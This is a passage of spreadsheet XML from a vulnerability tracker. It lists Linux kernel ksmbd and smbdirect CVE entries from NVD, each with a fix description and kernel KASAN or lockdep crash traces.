      <c r="K534" s="5" t="inlineStr"/>
      <c r="L534" s="5" t="inlineStr"/>
      <c r="M534" s="5" t="inlineStr"/>
      <c r="N534" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O534" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P534" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q534" s="5" t="inlineStr"/>
      <c r="R534" s="5" t="inlineStr"/>
      <c r="S534" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb/server: fix null-ptr-deref in ksmbd_ipc_tree_connect_request()
See the procedure below:
  ksmbd_tree_conn_connect
    ksmbd_share_config_get
      share-&gt;name = kstrdup() // fail
      if (!test_share_config_flag(share, KSMBD_SHARE_FLAG_PIPE)) // false
      // do not check `share-&gt;name`
    ksmbd_ipc_tree_connect_request
      strlen(share-&gt;name) // null-ptr-deref</t>
        </is>
      </c>
      <c r="T534" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90166</t>
        </is>
      </c>
    </row>
    <row r="535">
      <c r="A535" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B535" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C535" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90167</t>
        </is>
      </c>
      <c r="D535" s="5" t="inlineStr"/>
      <c r="E535" s="5" t="inlineStr"/>
      <c r="F535" s="5" t="inlineStr"/>
      <c r="G535" s="5" t="inlineStr"/>
      <c r="H535" s="5" t="inlineStr"/>
      <c r="I535" s="5" t="inlineStr"/>
      <c r="J535" s="5" t="inlineStr"/>
      <c r="K535" s="5" t="inlineStr"/>
      <c r="L535" s="5" t="inlineStr"/>
      <c r="M535" s="5" t="inlineStr"/>
      <c r="N535" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O535" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P535" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q535" s="5" t="inlineStr"/>
      <c r="R535" s="5" t="inlineStr"/>
      <c r="S535" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: serialize oplock close with pending break ownership
close may abort an in-flight oplock break while another breaker already
holds an opinfo reference. Releasing pending_break wakes that waiter, but
without serializing the close transition with bit acquisition it can become
a new break owner through the test_and_set_bit() fast path. It can then
overwrite OPLOCK_CLOSING with OPLOCK_ACK_WAIT and continue a break for
a dying opinfo.
Make OPLOCK_CLOSING terminal once the opinfo is removed from the inode
list. Serialize that transition, pending_break acquisition, and
OPLOCK_ACK_WAIT setup with an opinfo state lock. A breaker which loses
the race releases its ownership and returns -ENOENT. Explicitly wake
pending_break waiters during close so they can observe the terminal state.
Also prevent ACK and timeout paths from replacing OPLOCK_CLOSING with
OPLOCK_STATE_NONE.</t>
        </is>
      </c>
      <c r="T535" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90167</t>
        </is>
      </c>
    </row>
    <row r="536">
      <c r="A536" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B536" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C536" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90168</t>
        </is>
      </c>
      <c r="D536" s="5" t="inlineStr"/>
      <c r="E536" s="5" t="inlineStr"/>
      <c r="F536" s="5" t="inlineStr"/>
      <c r="G536" s="5" t="inlineStr"/>
      <c r="H536" s="5" t="inlineStr"/>
      <c r="I536" s="5" t="inlineStr"/>
      <c r="J536" s="5" t="inlineStr"/>
      <c r="K536" s="5" t="inlineStr"/>
      <c r="L536" s="5" t="inlineStr"/>
      <c r="M536" s="5" t="inlineStr"/>
      <c r="N536" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O536" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P536" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q536" s="5" t="inlineStr"/>
      <c r="R536" s="5" t="inlineStr"/>
      <c r="S536" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: retain connection for pending notify work
Deferred CHANGE_NOTIFY work keeps an async message ID after the original
request work is released. A durable handle can outlive its connection, so
the connection teardown can destroy its async IDA before the handle close
releases the pending notify work.
Give the synthetic deferred work a connection reference. Release it after
the async ID in ksmbd_free_work_struct(). This keeps the async IDA alive
until the deferred work is released, even when the original connection has
already left the connection list.
During server shutdown there is no client to receive a cleanup response.
Skip the write and only release the pending work.</t>
        </is>
      </c>
      <c r="T536" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90168</t>
        </is>
      </c>
    </row>
    <row r="537">
      <c r="A537" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B537" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C537" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90169</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2026-09-17</t>
        </is>
      </c>
      <c r="P537" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q537" s="5" t="inlineStr"/>
      <c r="R537" s="5" t="inlineStr"/>
      <c r="S537" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: free preauth sessions on connection teardown
SMB3.1.1 multichannel binding preserves the preauthentication hash in a
preauth_session between the NTLM negotiate and authenticate requests.
The binding NTLM negotiate allocates this object and returns
STATUS_MORE_PROCESSING_REQUIRED. If the client disconnects before it sends
the authenticate request, neither the authenticate nor error cleanup paths
free the object.
Release any remaining preauthentication sessions when tearing down the
connection. Initialize the list when allocating the connection so that this
cleanup is safe regardless of the negotiated dialect.</t>
        </is>
      </c>
      <c r="T537" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90169</t>
        </is>
      </c>
    </row>
    <row r="538">
      <c r="A538" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B538" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C538" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90170</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2026-09-17</t>
        </is>
      </c>
      <c r="P538" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q538" s="5" t="inlineStr"/>
      <c r="R538" s="5" t="inlineStr"/>
      <c r="S538" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: validate ipc response length before dereferencing its fields
ipc_validate_msg() computes the expected message size by reading length
fields out of the response buffer supplied by the userspace ksmbd daemon
(payload_sz, session_key_len, ngroups, ...).  Those fields are read before
the buffer is verified to be large enough to contain the struct they belong
to, so a short response makes the read land past the end of the allocation.
handle_response() sizes entry-&gt;response purely from the netlink attribute
length (nla_len()) and only guards the leading handle read, so the daemon
can install a response as small as the kmalloc-8 object seen below.  When
ipc_msg_send_request() then calls ipc_validate_msg() for a
KSMBD_EVENT_RPC_REQUEST, the cast to struct ksmbd_rpc_command reads
resp-&gt;payload_sz at offset 8 of an 8-byte allocation:
[ 3697.841381] ==================================================================
[ 3697.844099] BUG: KASAN: slab-out-of-bounds in ipc_msg_send_request+0x763/0x800
[ 3697.846604] Read of size 4 at addr ffff888105f95910 by task kworker/4:3/20682
[ 3697.849061]
[ 3697.849801] CPU: 4 UID: 0 PID: 20682 Comm: kworker/4:3 Not tainted 7.2.0-rc3-next-20260717-virtme #117 PREEMPT(lazy)
[ 3697.850077] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-debian-1.17.0-1 04/01/2014
[ 3697.850303] Workqueue: ksmbd-io handle_ksmbd_work
[ 3697.850592] Call Trace:
[ 3697.850794]  &lt;TASK&gt;
[ 3697.850952]  __dump_stack+0x21/0x60
[ 3697.851239]  dump_stack_lvl+0xc2/0x100
[ 3697.851528]  print_address_description+0x77/0x200
[ 3697.851816]  ? ipc_msg_send_request+0x763/0x800
[ 3697.852024]  print_report+0x58/0x70
[ 3697.852316]  kasan_report+0x117/0x150
[ 3697.852585]  ? down_write+0x146/0x1f0
[ 3697.852809]  ? ipc_msg_send_request+0x763/0x800
[ 3697.853082]  ipc_msg_send_request+0x763/0x800
[ 3697.853385]  ? __pfx_ipc_msg_send_request+0x10/0x10
[ 3697.853604]  ? kasan_unpoison+0x48/0x70
[ 3697.853936]  ? __pfx___up_read+0x10/0x10
[ 3697.854221]  ksmbd_rpc_ioctl+0x380/0x520
[ 3697.854542]  ? __pfx_ksmbd_rpc_ioctl+0x10/0x10
[ 3697.854757]  ? kasan_unpoison+0x48/0x70
[ 3697.854962]  ? copy_from_kernel_nofault+0x32c/0x4e0
[ 3697.855166]  ? kasan_unpoison+0x48/0x70
[ 3697.855416]  fsctl_pipe_transceive+0x139/0x7a0
[ 3697.855705]  ? __pfx_copy_from_kernel_nofault+0x10/0x10
[ 3697.855937]  ? __pfx_fsctl_pipe_transceive+0x10/0x10
[ 3697.856388]  ? __sanitizer_cov_trace_switch+0x7b/0x140
[ 3697.856620]  smb2_ioctl+0x1141/0x3420
[ 3697.856994]  ? __pfx_smb2_ioctl+0x10/0x10
[ 3697.857182]  ? get_smb2_cmd_val+0xe3/0x1c0
[ 3697.857655]  handle_ksmbd_work+0x9ad/0x15e0
[ 3697.858034]  ? __pfx_handle_ksmbd_work+0x10/0x10
[ 3697.858251]  ? lock_release+0xf7/0x360
[ 3697.858466]  ? process_scheduled_works+0x954/0x1600
[ 3697.858698]  ? process_scheduled_works+0x954/0x1600
[ 3697.858905]  process_scheduled_works+0xc22/0x1600
[ 3697.859368]  ? __pfx_process_scheduled_works+0x10/0x10
[ 3697.859637]  ? __pfx_assign_work+0x10/0x10
[ 3697.859896]  ? lock_is_held_type+0x7b/0x110
[ 3697.860146]  worker_thread+0x975/0xee0
[ 3697.860524]  ? __pfx_do_raw_spin_lock+0x10/0x10
[ 3697.860830]  ? __kthread_parkme+0x21e/0x260
[ 3697.861105]  kthread+0x3a6/0x490
[ 3697.861423]  ? __pfx_worker_thread+0x10/0x10
[ 3697.861643]  ? __pfx_kthread+0x10/0x10
[ 3697.861878]  ret_from_fork+0x55a/0xa20
[ 3697.862194]  ? __pfx_ret_from_fork+0x10/0x10
[ 3697.862480]  ? __pfx_kthread+0x10/0x10
[ 3697.862714]  ret_from_fork_asm+0x1a/0x30
[ 3697.862965]  &lt;/TASK&gt;
[ 3697.863039]
[ 3697.938882] Allocated by task 20761:
[ 3697.940257]  kasan_save_track+0x3e/0x80
[ 3697.941782]  __kasan_kmalloc+0x72/0x90
[ 3697.943228]  __kvmalloc_node_noprof+0x3e9/0x6a0
[ 3697.944948]  handle_generic_event+0x59b/0x750
[ 3697.946592]  genl_family_rcv_msg_doit+0x3d6/0x560
[ 3697.946977]  genl_rcv_msg+0x67c/0x900
[ 3697.947224]  netlink_rcv_skb+0x286/0x580
[ 3697.947488]  genl_rcv+0x2d/0x80
[ 3
---truncated---</t>
        </is>
      </c>
      <c r="T538" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90170</t>
        </is>
      </c>
    </row>
    <row r="539">
      <c r="A539" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B539" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C539" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90171</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2026-09-17</t>
        </is>
      </c>
      <c r="P539" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q539" s="5" t="inlineStr"/>
      <c r="R539" s="5" t="inlineStr"/>
      <c r="S539" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: smbdirect: release pending child sockets outside the handler lock
smbdirect_socket_destroy() releases the listener's pending/ready child
sockets while still holding the listener's handler lock, the
&amp;id_priv-&gt;handler_mutex taken via rdma_lock_handler(), not
sc-&gt;listen.lock, and before the listener's own rdma_destroy_id().
That ordering has one real consequence and one cosmetic one.
The real one: smbdirect_socket_release() drops the child's last
reference, which destroys the child's cm_id.  Doing that before the
listener's rdma_destroy_id() lets _cma_cancel_listens(), running from
the listener's _destroy_id(), walk an already freed child id_priv,
which KASAN catches as a slab-use-after-free during listener shutdown:
[ 4758.909130] BUG: KASAN: slab-use-after-free in __mutex_lock+0x1469/0x1560
[ 4758.911450] Read of size 1 at addr ffff88821c381db4 by task ksmbd.control/1652
[ 4758.913262] Call Trace:
[ 4758.913267]  &lt;TASK&gt;
[ 4758.913299]  __mutex_lock+0x1469/0x1560
[ 4758.913408]  _cma_cancel_listens+0x312/0x3b0
[ 4758.913413]  _destroy_id+0x363/0xee0
[ 4758.913417]  smbdirect_socket_destroy_sync+0x17d5/0x2440
[ 4758.913443]  smbdirect_socket_release+0x124/0x230
[ 4758.913451]  ksmbd_rdma_stop_listening+0x9f/0x190
[ 4758.913457]  ksmbd_conn_transport_destroy+0x65/0x3c0
[ 4758.913463]  kill_server_store+0x1fb/0x2b0
[ 4758.913501]  kernfs_fop_write_iter+0x349/0x4d0
[ 4758.913507]  vfs_write+0x5e7/0xc70
[ 4758.913528]  ksys_write+0x12a/0x210
[ 4758.913541]  do_syscall_64+0x135/0x460
[ 4758.913555]  entry_SYSCALL_64_after_hwframe+0x77/0x7f
The cosmetic one: releasing a child recurses into
smbdirect_socket_destroy(), which takes the child's own
rdma_lock_handler() lock nested under the listener's.  The listener's
and the child's cm_id are always different instances, so this cannot
deadlock for real; the CM core itself nests a new connection id's
handler_mutex under the listening id's in cma_ib_req_handler().  But
lockdep only sees one lock class, reports possible recursive locking,
and then disables itself, hiding real locking bugs for the rest of the
run:
[ 2424.579653] WARNING: possible recursive locking detected
[ 2424.581180] 7.1.0-next-20260623+ #89 Not tainted
[ 2424.582548] --------------------------------------------
[ 2424.584500] ksmbd.control/8854 is trying to acquire lock:
[ 2424.586817] ffff888102303c20 (&amp;id_priv-&gt;handler_mutex){+.+.}-{4:4}, at: smbdirect_socket_destroy_sync+0xc39/0x2440
[ 2424.590590]
[ 2424.590590] but task is already holding lock:
[ 2424.591601] ffff888102046c20 (&amp;id_priv-&gt;handler_mutex){+.+.}-{4:4}, at: smbdirect_socket_destroy_sync+0xc39/0x2440
[ 2424.594178]
[ 2424.594178] other info that might help us debug this:
[ 2424.596634]  Possible unsafe locking scenario:
[ 2424.596634]
[ 2424.598841]        CPU0
[ 2424.599765]        ----
[ 2424.600695]   lock(&amp;id_priv-&gt;handler_mutex);
[ 2424.601836]   lock(&amp;id_priv-&gt;handler_mutex);
[ 2424.602590]
[ 2424.602590]  *** DEADLOCK ***
[ 2424.602590]
[ 2424.604512]  May be due to missing lock nesting notation
Splice the pending/ready children onto a local list under the
listener's listen.lock, while the handler lock is held so a concurrent
CM CONNECT_REQUEST cannot add more, but defer the actual
smbdirect_socket_release() calls until after the listener's cm_id has
been destroyed and its handler lock dropped.  The children are
independent sockets whose teardown needs neither the listener's
handler lock nor its cm_id.
Found with ksmbdzzer [2], a KSMBD fuzzer that drives libFuzzer with a
kcov-dataflow [1] coverage vector: it folds each instrumented
comparison/argument's runtime operand value together with its PC (the
default arm mixes them as pc⊕val) so that a new operand value at a known
site counts as new coverage.
[1] https://lwn.net/Articles/1077606/
[2] https://github.com/yskzalloc/kcov-dataflow</t>
        </is>
      </c>
      <c r="T539" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90171</t>
        </is>
      </c>
    </row>
    <row r="540">
      <c r="A540" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B540" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C540" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90172</t>
        </is>
      </c>
      <c r="D540" s="5" t="inlineStr"/>
      <c r="E540" s="5" t="inlineStr"/>
      <c r="F540" s="5" t="inlineStr"/>
      <c r="G540" s="5" t="inlineStr"/>
      <c r="H540" s="5" t="inlineStr"/>
      <c r="I540" s="5" t="inlineStr"/>
      <c r="J540" s="5" t="inlineStr"/>
      <c r="K540" s="5" t="inlineStr"/>
      <c r="L540" s="5" t="inlineStr"/>
      <c r="M540" s="5" t="inlineStr"/>
      <c r="N540" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O540" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P540" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q540" s="5" t="inlineStr"/>
      <c r="R540" s="5" t="inlineStr"/>
      <c r="S540" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: smbdirect: destroy QP before mem pools on accept failure
On the rdma_accept_failed error path of
smbdirect_accept_connect_request(), the receive io posted just above is
owned by the QP (recv_io is set to NULL after a successful post).  The
error path fell through to smbdirect_connection_destroy_mem_pools()
before smbdirect_connection_destroy_qp(), so the mem pools and the
recv_io slab cache were destroyed while that recv_io was still
outstanding on the QP.
The drain in smbdirect_connection_destroy_qp() (ib_drain_qp()) is what
runs the recv completion that returns the recv_io to the free list, so
destroying the pools first leaves the object outstanding at
kmem_cache_destroy() time ("Slab cache still has objects") and later
frees it into an already-destroyed mempool (mempool_free_bulk
NULL-pointer dereference).
Give rdma_accept_failed its own teardown that drains the QP first, then
destroys the mem pools, and returns.  The remaining labels
(post_recv_io_failed onward) run before the recv_io was ever posted, so
they keep the mem-pools-then-qp order.
The outstanding recv_io at kmem_cache_destroy() time:
[ 3487.344647] =============================================================================
[ 3487.349942] BUG smbdirect_recv_io_cache_ffff88811ba99000 (Not tainted): Objects remaining on __kmem_cache_shutdown()
[ 3487.356078] -----------------------------------------------------------------------------
[ 3487.356078]
[ 3487.356738] Object 0xffff8881511c3440 @offset=13376
[ 3487.358464] Allocated in mempool_alloc_noprof+0x18c/0x290 age=1194 cpu=6 pid=22254
[ 3487.361197]  mempool_alloc_noprof+0x18c/0x290
[ 3487.361542]  smbdirect_connection_create_mem_pools+0x405/0x780
[ 3487.361972]  smbdirect_accept_connect_request+0x5a8/0x1b80
[ 3487.362359]  smbdirect_listen_rdma_event_handler+0x1579/0x1b90
[ 3487.362779]  cma_cm_event_handler+0x9c/0x230
[ 3487.363096]  cma_ib_req_handler+0x2682/0x45d0
[ 3487.363414]  cm_process_work+0x56/0x3d0
[ 3487.363676]  cm_work_handler+0x8a0e/0xd000
[ 3487.367496]  process_scheduled_works+0xa07/0x13a0
[ 3487.367859]  worker_thread+0x7c9/0xc80
[ 3487.368148]  kthread+0x341/0x430
[ 3487.368407]  ret_from_fork+0x3a8/0x7a0
[ 3487.368704]  ret_from_fork_asm+0x1a/0x30
[ 3487.370307] Slab 0xffffea0005447000 objects=19 used=1 fp=0xffff8881511c0040 flags=0x100000000000240(workingset|head|node=0|zone=2)
[ 3487.372840] ------------[ cut here ]------------
[ 3487.373195] WARNING: mm/slub.c:1244 at __slab_err+0x1a/0x30, CPU#6: kworker/6:84/22254
[ 3487.373759] Modules linked in:
[ 3487.373993] CPU: 6 UID: 0 PID: 22254 Comm: kworker/6:84 Tainted: G    B               7.1.0-next-20260623+ #88 PREEMPT(lazy)
[ 3487.374778] Tainted: [B]=BAD_PAGE
[ 3487.377830] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-debian-1.17.0-1 04/01/2014
[ 3487.378515] Workqueue: ib_cm cm_work_handler
[ 3487.378820] RIP: 0010:__slab_err+0x1a/0x30
[ 3487.379129] Code: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 0f 1f 44 00 00 e8 36 00 00 00 bf 05 00 00 00 be 01 00 00 00 e8 f7 75 45 00 90 &lt;0f&gt; 0b 90 c3 cc cc cc cc cc 66 66 66 66 2e 0f 1f 84 00 00 00 00 00
[ 3487.383255] RSP: 0018:ffff888220fc7050 EFLAGS: 00010093
[ 3487.383643] RAX: ffffffff8168e60a RBX: ffff88810955e640 RCX: ffff88821c381d80
[ 3487.384158] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffffff870fa080
[ 3487.384662] RBP: ffff888220fc7068 R08: ffffffff870fa087 R09: 1ffffffff0e1f410
[ 3487.385192] R10: dffffc0000000000 R11: fffffbfff0e1f411 R12: ffffea0005447210
[ 3487.385674] R13: ffffea0005447000 R14: ffff888220fc7068 R15: ffff88812a8ab300
[ 3487.388932] FS:  0000000000000000(0000) GS:ffff888427e76000(0000) knlGS:0000000000000000
[ 3487.389529] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 3487.389934] CR2: 00007ffcf2d84fd8 CR3: 0000000111d64006 CR4: 0000000000f72ef0
[ 3487.390440] PKRU: 55555554
[ 3487.390641] Call Trace:
[ 3487.390826]  &lt;TASK&gt;
[ 3
---truncated---</t>
        </is>
      </c>
      <c r="T540" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90172</t>
        </is>
      </c>
    </row>
    <row r="541">
      <c r="A541" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B541" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C541" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90173</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2026-09-17</t>
        </is>
      </c>
      <c r="P541" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q541" s="5" t="inlineStr"/>
      <c r="R541" s="5" t="inlineStr"/>
      <c r="S541" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: smbdirect: free completion queues with ib_free_cq()
smbdirect_connection_destroy_qp() creates the send and receive completion
queues with ib_alloc_cq_any(), which for IB_POLL_WORKQUEUE arms an
internal completion handler that runs ib_cq_poll_work() on a workqueue.
Tearing those CQs down with ib_destroy_cq() frees them without first
cancelling that poll work.
If the provider posts a completion late -- for example Soft-RoCE (rxe)
posting an RNR error from rxe_receiver() after rdma_destroy_qp() -- the
handler re-queues ib_cq_poll_work() on the already-freed CQ, and a
follow-on access faults in rxe_req_notify_cq().
Use ib_free_cq(), which cancel_work_sync()es the poll work before freeing
the CQ, so no completion handler can run against a freed queue.
[ 1236.599526] ==================================================================
[ 1236.602142] BUG: KASAN: slab-use-after-free in ib_cq_poll_work+0xd0/0x1a0
[ 1236.605524] Read of size 8 at addr ffff888111865800 by task kworker/4:1H/82
[ 1236.609017]
[ 1236.609270] CPU: 4 UID: 0 PID: 82 Comm: kworker/4:1H Not tainted 7.2.0-rc3-next-20260717-virtme #110 PREEMPT(lazy)
[ 1236.609287] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-debian-1.17.0-1 04/01/2014
[ 1236.609498] Workqueue: ib-comp-wq ib_cq_poll_work
[ 1236.609525] Call Trace:
[ 1236.609536]  &lt;TASK&gt;
[ 1236.609545]  __dump_stack+0x21/0x60
[ 1236.609562]  dump_stack_lvl+0xc2/0x100
[ 1236.609573]  print_address_description+0x77/0x200
[ 1236.609587]  ? ib_cq_poll_work+0xd0/0x1a0
[ 1236.609597]  print_report+0x58/0x70
[ 1236.609607]  kasan_report+0x117/0x150
[ 1236.609623]  ? ib_cq_poll_work+0xd0/0x1a0
[ 1236.609636]  ? process_scheduled_works+0x954/0x1600
[ 1236.609650]  ib_cq_poll_work+0xd0/0x1a0
[ 1236.609662]  ? process_scheduled_works+0x954/0x1600
[ 1236.609674]  process_scheduled_works+0xc22/0x1600
[ 1236.609698]  ? __pfx_process_scheduled_works+0x10/0x10
[ 1236.609713]  ? __pfx_assign_work+0x10/0x10
[ 1236.609726]  ? lock_is_held_type+0x7b/0x110
[ 1236.609741]  worker_thread+0x975/0xee0
[ 1236.609757]  ? __pfx_do_raw_spin_lock+0x10/0x10
[ 1236.609775]  ? __kthread_parkme+0x21e/0x260
[ 1236.609789]  kthread+0x3a6/0x490
[ 1236.609800]  ? __pfx_worker_thread+0x10/0x10
[ 1236.609809]  ? __pfx_kthread+0x10/0x10
[ 1236.609820]  ret_from_fork+0x55a/0xa20
[ 1236.609835]  ? __pfx_ret_from_fork+0x10/0x10
[ 1236.609850]  ? __pfx_kthread+0x10/0x10
[ 1236.609861]  ret_from_fork_asm+0x1a/0x30
[ 1236.609880]  &lt;/TASK&gt;
[ 1236.609886]
[ 1236.661292] Allocated by task 5076:
[ 1236.662640]  kasan_save_track+0x3e/0x80
[ 1236.663842]  __kasan_kmalloc+0x72/0x90
[ 1236.664763]  __kmalloc_noprof+0x2b0/0x5d0
[ 1236.665356]  __ib_alloc_cq+0x284/0x1000
[ 1236.666573]  __ib_alloc_cq_any+0x23e/0x340
[ 1236.668654]  smbdirect_connection_create_qp+0x6f7/0x1070
[ 1236.669757]  smbdirect_accept_connect_request+0x500/0x1ca0
[ 1236.672625]  smbdirect_listen_rdma_event_handler+0x1655/0x1c50
[ 1236.673930]  cma_listen_handler+0x1bf/0x260
[ 1236.674923]  cma_cm_event_handler+0x128/0x380
[ 1236.676926]  cma_ib_req_handler+0x2d3d/0x4de0
[ 1236.678368]  cm_process_work+0xb0/0x530
[ 1236.680454]  cm_queue_work_unlock+0xb1/0x230
[ 1236.681673]  cm_work_handler+0x969f/0xdca0
[ 1236.682704]  process_scheduled_works+0xc22/0x1600
[ 1236.683447]  worker_thread+0x975/0xee0
[ 1236.685901]  kthread+0x3a6/0x490
[ 1236.688164]  ret_from_fork+0x55a/0xa20
[ 1236.689522]  ret_from_fork_asm+0x1a/0x30
[ 1236.690073]
[ 1236.690378] Freed by task 5137:
[ 1236.692242]  kasan_save_track+0x3e/0x80
[ 1236.694272]  kasan_save_free_info+0x40/0x50
[ 1236.695514]  __kasan_slab_free+0x3a/0x60
[ 1236.696773]  kfree+0x14e/0x4e0
[ 1236.697216]  ib_destroy_cq_user+0x18d/0x250
[ 1236.699817]  smbdirect_connection_destroy_qp+0xf2/0x280
[ 1236.702115]  smbdirect_socket_destroy_sync+0x1607/0x2720
[ 1236.704062]  smbdirect_socket_release+0x140/0x280
[ 1236.705286]  smb_direct_free_transpor
---truncated---</t>
        </is>
      </c>
      <c r="T541" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90173</t>
        </is>
      </c>
    </row>
    <row r="542">
      <c r="A542" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B542" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C542" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90174</t>
        </is>
      </c>
      <c r="D542" s="5" t="inlineStr"/>
      <c r="E542" s="5" t="inlineStr"/>
      <c r="F542" s="5" t="inlineStr"/>
      <c r="G542" s="5" t="inlineStr"/>
      <c r="H542" s="5" t="inlineStr"/>
      <c r="I542" s="5" t="inlineStr"/>
      <c r="J542" s="5" t="inlineStr"/>
      <c r="K542" s="5" t="inlineStr"/>
      <c r="L542" s="5" t="inlineStr"/>
      <c r="M542" s="5" t="inlineStr"/>
      <c r="N542" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O542" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P542" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q542" s="5" t="inlineStr"/>
      <c r="R542" s="5" t="inlineStr"/>
      <c r="S542" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: fix slab-out-of-bounds read in ksmbd_alloc_user()
ksmbd_alloc_user() copies resp-&gt;hash_sz bytes out of the mountd IPC
login response with
	user-&gt;passkey_sz = resp-&gt;hash_sz;
	user-&gt;passkey = kmalloc(resp-&gt;hash_sz, KSMBD_DEFAULT_GFP);
	if (user-&gt;passkey)
		memcpy(user-&gt;passkey, resp-&gt;hash, resp-&gt;hash_sz);
resp-&gt;hash_sz is a __u16 supplied by the response, but resp-&gt;hash[] is
only KSMBD_REQ_MAX_HASH_SZ bytes.  A malformed or malicious login
response can set hash_sz well beyond that (up to 65535), so the memcpy()
reads past the end of the response object.  ipc_validate_msg() does not
bound hash_sz, so reject any response whose hash_sz exceeds the on-stack
hash[] buffer before allocating and copying.
[ 2030.238706] BUG: KASAN: slab-out-of-bounds in ksmbd_alloc_user+0x278/0x680
[ 2030.240549] Read of size 65535 at addr ffff888121bb6680 by task kworker/4:1/18611
[ 2030.242296]
[ 2030.242710] CPU: 4 UID: 0 PID: 18611 Comm: kworker/4:1 Not tainted 7.1.0-next-20260623-virtme #96 PREEMPT(lazy)
[ 2030.242732] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-debian-1.17.0-1 04/01/2014
[ 2030.242743] Workqueue: ksmbd-io handle_ksmbd_work
[ 2030.242763] Call Trace:
[ 2030.242769]  &lt;TASK&gt;
